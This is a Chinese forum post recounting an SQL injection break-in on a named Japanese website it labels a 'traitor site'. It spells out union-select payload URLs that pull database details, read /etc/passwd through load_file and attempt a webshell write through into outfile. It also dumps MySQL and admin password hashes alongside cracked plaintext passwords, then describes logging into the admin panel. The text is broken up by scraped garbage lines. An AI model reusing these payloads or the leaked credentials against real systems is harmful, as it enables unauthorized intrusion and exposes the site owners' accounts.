原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

8 }7 \( `% }6 g5 Z7 O
" a  V$ W0 }3 W. V9 P! ?0x01. 检测 www.zuaa.jp 收集数据


whatweb
! z) o5 V' r$ V1 N

) Z+ c$ E: F6 \% _5 U利用NMAP扫描

6 A; z+ P( r9 T" y中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
( x) r5 G! K: y1 v  A! }0x02.找注入点
找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390
9 G2 @( l2 A  p3 o

0x03.order by
7 Z% B3 n: J" ?& ^  n             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
+ z* K' J: W) `
6 I' V- N; Q6 l/ W* T4 ~order by 28报错，order by 27正常
) b5 I3 Q. l; D6 n, x4 Y( k5 H! S
7 r9 p* N$ G# Q6 g7 j0x04.   union手动查询
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
8 p9 k( I- q; J8 ?* V' \添加到 27 时正常显示

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

0x05. info:
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
# _. v8 A' L- O& t
user:            root@localhost
( o7 w: a# t! M: @database:    openpne
version:      4.1.22
os:             portbld-freebsd5.4
+ N1 P; l4 m# p
0x06. root用户
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

5 `- b) a3 G( [" @; Q9 @通过工具转换

: q2 z1 s7 a% K/ C* R7 u- U中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
' t- a7 l9 n; z; Y) B. l' S; e- M
3 O3 Z& L* f  H  m$ L0x07. 利用 into outfile
. y# m* z9 B6 M6 C" o6 D全部都失败
% }& k( E" F7 |/ ]* p' thttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
$ [8 K1 n" ~1 b) c: i
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
. G/ m  n! V9 B6 A: c4 i( X0 s
页面显示“MDB2 Error:syntax error”
# \% n! G; w* A1 {
0x08. 利用 mysql 4.1
猜常规表名，字段未果 工具 sqlmap
) g, i5 d0 B( ]/ W  a8 l. s6 S5 T$ L中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
3 u  O: E; Y; h' f. t9 Y


0x09. 查找后台
利用 现有的各种 后台工具尝试都不行

) \2 ^7 {. s* G0x10.  MySL外联方法
! y- b8 q' v6 e- k1 O: q8 E3 d从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
: Q) F5 i8 W( U. N9 y7 Rhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user

这个可以在 www.cmd5.com 解密
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
4 m% |0 g  s$ p% v) k' P* u$ _工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知
' J) N/ Z; l- L( X5 s% Y3 a

0x11. 网站突破
发现网站的源程序 openpne, google 下载 openpne 源码

3 E$ l4 i: z! y# I# `  J
' N, X2 |" n! t" u% s0x12. 默认信息利用
http://sns.zuaa.jp/?m=admin&a=page_login

/ i4 P, b) f0 y1 i& w表名 (c_admin_user) ，字段名（username,password）
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user

解密
  a2 j( S( M) s: ezuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
- S: {9 g" X. v. g( p7 t! o3 vzuaajp:c0923ec5857796a393da99905008c176,          zju1897
; X# ~# ?8 T7 X; C  e) v+ y$ {. U2 n
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
# ^; N# l% c7 W8 B
0x13. 登录后台
* `6 n0 ~4 c2 S4 j+ O0 J2 |

. u2 f  G1 [1 r! p
5 I: u4 e+ E8 R6 [0x14. 小结
! y. {( K4 z" A/ [& g7 A利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
$ @- B! Z  R' J感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
# h7 H% C8 K/ h4 O/ s/ J6 @0 @------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
- |6 ^& _6 I2 @, h) w. C中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！
! P% t& ^" h( s- m- b) _

荒村狂客

哪个牛人 费的这劲 入侵的